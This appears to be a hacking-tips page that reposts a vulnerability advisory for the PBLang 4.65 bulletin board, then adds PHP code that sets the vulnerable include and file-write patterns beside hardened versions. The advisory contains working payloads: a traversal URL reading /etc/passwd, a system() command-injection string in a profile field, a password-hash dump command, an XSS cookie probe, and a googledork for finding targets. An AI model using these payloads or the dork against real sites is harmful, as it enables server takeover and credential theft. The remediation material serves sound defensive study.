GOOGLE HACKING TRICKS, LEARN SECRETS OF HACKING

Output Index Script

“Software PBLang” 4.65 filetype:php

Posted by Zul Afdal

my advisory:

[quote]
PBLang 4.65 (possibly prior versions) remote code execution / administrative credentials disclosure / system information disclosure / cross site scripting / path disclosure

software:
description: PBLang is a powerful flatfile Bulletin Board System. It combines many features of a professional board, but does not even require SQL support. It is completely based on text files.
site: http://pblang.drmartinus.de/
download: https://sourceforge.net/project/showfiles.php?group_id=62953

1) system disclosure:

You can traverse directories and see any file (if not .php or .php3 etc.) and include any file on the target system using '../' chars and a null byte, example:

    http://[target]/[path]/pblang/setcookie.php?u=../../../../../etc/passwd

vulnerable code in setcookie.php:

    ...
    $usrname=$HTTP_GET_VARS['u'];
    @include($dbpath.'/'.$usrname.'temp');
    ...

2) remote code execution:

The board stores data in files. When you register, a [username] file without extension is created in the /db/members directory; inside we have PHP code that is executed when you login, so in the location field type:

    madrid"; system($HTTP_POST_VARS[cmd]); echo "

In the /db/members/[username] file we have:

    ...
    $userlocation="madrid"; system($HTTP_GET_VARS[cmd]); echo "";
    ...

There is no way to access the script directly: /db/members is .htaccess protected and extra lines are deleted from the files after you login, so you should make it all in a POST request and re-register. This is my proof of concept exploit; to include the [username] file I make a GET request of setcookie.php?u=[username]&cmd=[command], but surely you can call the username file through some other inclusion when you surf the forum:

    http://rgod.altervista.org/pblang465.html

3) admin/user credentials disclosure:

You can see the password hash of any user or admin by sending the command:

    cat ./db/members/[username]

4) cross site scripting:

Register and in the location field type:

    madrid"; echo "alert(document.cookie)

then check this url:

    http://[target]/[path]/setcookie.php?u=[username]

5) path disclosure:

    http://[target]/[path]/setcookie.php?u=

googledork: "Software PBLang" filetype:php

rgod
site: http://rgod.altervista.org
mail: retrogod@aliceposta.it
original advisory: http://rgod.altervista.org/pblang465.html
[/quote]
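The two code-level weaknesses behind the advisory above are a query-string value concatenated straight into include() (vectors 1 and 5) and user profile fields written into a PHP file as source (vectors 2, 3 and 4). The following is an added PHP example that puts each pattern beside a hardened form. It is not PBLang code and not rgod's exploit; the function names, the members directory layout and the demo payloads are assumptions made for the illustration.

```php
<?php
// Added example, not PBLang code: the two include()/file-write patterns the
// advisory describes, each beside a hardened form. Function names and the
// directory layout are assumptions for the illustration.

// Pattern 1, as described: the query-string username is concatenated into
// the include path, so "../../../../../etc/passwd" walks out of $dbpath.
// (On PHP < 5.3.4 a trailing NUL also truncated the path, dropping "temp".)
function vulnerable_member_file(string $dbpath, string $username): string
{
    return $dbpath . '/' . $username . 'temp';   // do not include() this
}

// Hardened form: allowlist the username, then check that the canonical
// path is still inside the members directory before it is ever included.
function safe_member_file(string $dbpath, string $username): ?string
{
    // An allowlist of username characters blocks '/', '.', and NUL outright.
    if (!preg_match('/\A[A-Za-z0-9_]{1,32}\z/', $username)) {
        return null;
    }
    $base = realpath($dbpath);
    $candidate = realpath($dbpath . '/' . $username . 'temp');
    if ($base === false || $candidate === false) {
        return null;                      // missing file or directory
    }
    // Containment check catches anything realpath() resolved elsewhere,
    // e.g. through a symlink planted in the members directory.
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// Pattern 2, as described: profile fields are written into a PHP file as
// source. A double quote in "location" closes the string literal and the
// rest of the field runs as code the next time the file is included.
function vulnerable_member_record(array $fields): string
{
    $src = "<?php\n";
    foreach ($fields as $name => $value) {
        $src .= '$user' . $name . '="' . $value . "\";\n";   // unescaped
    }
    return $src;
}

// Hardened form: let var_export() produce the PHP string literal, so the
// injected text is stored as data; also restrict which fields are written.
function safe_member_record(array $fields): string
{
    $allowed = ['name', 'location'];
    $src = "<?php\n";
    foreach ($allowed as $name) {
        $value = (string) ($fields[$name] ?? '');
        $src .= '$user' . $name . ' = ' . var_export($value, true) . ";\n";
    }
    return $src;
}

// Demo with constructed payloads modelled on the advisory (not a live target).
$db = sys_get_temp_dir() . '/pblang_demo_' . getmypid();
mkdir($db . '/members', 0700, true);
file_put_contents($db . '/members/rgodtemp', "<?php\n\$userlocation = 'madrid';\n");

foreach (['rgod', '../../../../../etc/passwd', "rgod\0", 'a/b'] as $u) {
    $verdict = safe_member_file($db . '/members', $u) === null ? 'rejected' : 'allowed';
    printf("%-28s %s\n", addcslashes($u, "\0"), $verdict);
}

$injected = ['name' => 'rgod', 'location' => 'madrid"; system($HTTP_POST_VARS[cmd]); echo "'];
echo "\n-- unsafe record --\n", vulnerable_member_record($injected);
echo "\n-- safe record --\n", safe_member_record($injected);

unlink($db . '/members/rgodtemp');
rmdir($db . '/members');
rmdir($db);
```

The allowlist is the primary control; the realpath() containment check is there for the case where something inside the members directory (a symlink, for instance) resolves outside it. The .htaccess protection the advisory mentions only stops direct requests to /db/members and does nothing against an include() reached through another script, which is why the fix has to sit at the include site. Storing profile data as JSON or serialized text rather than as PHP source removes the code/data mixing of the second pattern altogether.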